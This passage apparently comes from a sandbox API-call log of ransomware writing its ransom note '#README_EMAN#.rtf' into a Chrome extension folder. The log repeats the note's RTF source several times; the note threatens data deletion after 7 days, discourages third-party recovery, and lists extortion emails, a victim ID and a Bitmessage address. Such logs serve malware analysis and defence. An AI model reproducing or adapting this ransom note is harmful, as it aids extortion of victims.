https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.750] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.750] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.751] CloseHandle (hObject=0x294) returned 1 [0297.751] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\#readme_eman#.rtf")) returned 0xffffffff [0297.751] GetLastError () returned 0x2 [0297.751] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.751] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 